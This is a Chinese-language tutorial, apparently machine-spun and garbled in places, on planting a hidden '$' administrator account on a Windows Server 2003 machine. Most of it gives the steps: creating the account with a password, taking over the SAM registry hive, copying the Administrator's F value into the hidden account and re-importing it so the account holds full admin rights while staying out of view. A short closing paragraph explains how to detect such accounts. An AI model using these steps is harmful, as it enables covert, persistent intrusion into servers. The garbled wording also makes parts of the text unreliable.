怎样在Win2003网络服务器加上掩藏客户及怎样看透掩藏客户
本文摘要: c:\ net lnfjhh$ wrsky /add//后边加$ user 看不见.随后运作regedt32.exe(留意并不是regedit.exe)先寻找HKEY_LOCAL_MAICHINE\SAM\SAM 点一下它 ,随后在莱单 安全性 - 管理权限 加上自身如今登陆的账号或组,把 管理权限 - 彻底操纵 - 容许 加上勾,随后明确.

c:\ net lnfjhh$ wrsky /add

//后边加$ user 看不见.

随后运作regedt32.exe(留意并不是regedit.exe)

先寻找HKEY_LOCAL_MAICHINE\SAM\SAM 点一下它 ,随后在莱单 安全性 - 管理权限 加上自身如今登陆的账号或组,

把 管理权限 - 彻底操纵 - 容许 加上勾,随后明确.

那样便可以立即载入当地sam的信息内容

如今运作regedit.exe

开启键 HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\lnfjhh$

查询默认设置键数值 0x3f1 相对导出来以下

HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\lnfjhh$ 为cnlnfjhh$.reg

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1 为 3f1.reg

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 为 lf4.reg (Administrators的相对键)

用记事簿本开启lf4.reg 寻找以下的 F 的值,例如这一事例中以下

F =hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\

00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\

f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\

00,00,00,00,00,00,00

把其拷贝后,开启3f1.reg,寻找 F 的值,将其删掉,随后把上边的那段黏贴.

$.reg,把里边的內容,例如这一事例中以下面这一段拷贝

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\lnfjhh$]

@=hex(3f1):

返回3f1.reg 黏贴上边这一段到文档最终,最终转化成的文档內容以下

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1]

F =hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\

00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\

f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\

00,00,00,00,00,00,00

V =hex:00,00,00,00,d4,00,00,00,02,00,01,00,d4,00,00,00,1a,00,00,00,00,00,00,\

00,f0,00,00,00,10,00,00,00,00,00,00,00,00,01,00,00,12,00,00,00,00,00,00,00,\

14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,\

01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,\

00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,\

00,00,00,00,00,00,00,00,00,14,01,00,00,15,00,00,00,a8,00,00,00,2c,01,00,00,\

08,00,00,00,01,00,00,00,34,01,00,00,14,00,00,00,00,00,00,00,48,01,00,00,14,\

00,00,00,00,00,00,00,5c,01,00,00,04,00,00,00,00,00,00,00,60,01,00,00,04,00,\

00,00,00,00,00,00,01,00,14,80,b4,00,00,00,c4,00,00,00,14,00,00,00,44,00,00,\

00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\

00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\

00,70,00,04,00,00,00,00,00,14,00,1b,03,02,00,01,01,00,00,00,00,00,01,00,00,\

00,00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,\

00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00,\

00,00,24,00,04,00,02,00,01,05,00,00,00,00,00,05,15,00,00,00,b4,b7,cd,22,dd,\

e8,e4,1c,be,04,3e,32,e8,03,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,\

00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,48,00,65,00,6c,00,70,\

00,41,00,73,00,73,00,69,00,73,00,74,00,61,00,6e,00,74,00,00,00,dc,8f,0b,7a,\

4c,68,62,97,a9,52,4b,62,10,5e,37,62,d0,63,9b,4f,dc,8f,0b,7a,4f,53,a9,52,84,\

76,10,5e,37,62,01,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,\

ff,ff,ff,88,d7,f1,01,02,00,00,07,00,00,00,01,00,01,00,db,57,a2,94,f8,41,63,\

fa,2c,88,d7,f1,cd,99,cf,0d,01,00,01,00,a0,05,70,54,f3,45,3e,4a,64,95,ef,6c,\

37,f1,02,cf,01,00,01,00,01,00,01,00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\lnfjhh$]

@=hex(3f1):

储存后,将cnlnfjhh$客户删掉

c:\ net lnfjhh$ /delete

运作regedit.exe 将大家早已改动好的3f1.reg文档导进.

最终,开启regedt32.exe 寻找HKEY_LOCAL_MAICHINE\SAM\SAM 点一下它 ,随后在莱单 安全性 - 管理权限 删掉刚刚加上的账号

随后 销户当今客户 lnfjhh/wrsky 登录 便会是 最大管理权限了.

user 和 测算机管理方法 lnfjhh$, 记住第一次就把登陆密码设定好,不必改登陆密码

-------------------------------------------------------------------------------

相反。开启[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names

users下边的新项目跟names下边的新项目总数不一致时(比names下边的多),毫无疑问有内鬼。看names新项目的键值相匹配users下边的新项目名字,相匹配不了得话就删除吧。

见到上边这种标识符不是是脑壳都变大?中技也感觉,但是的确是合理的方式,多把握一些他人沒有的专业知识毫无疑问是一件事们基本建设网站有益处的。

企业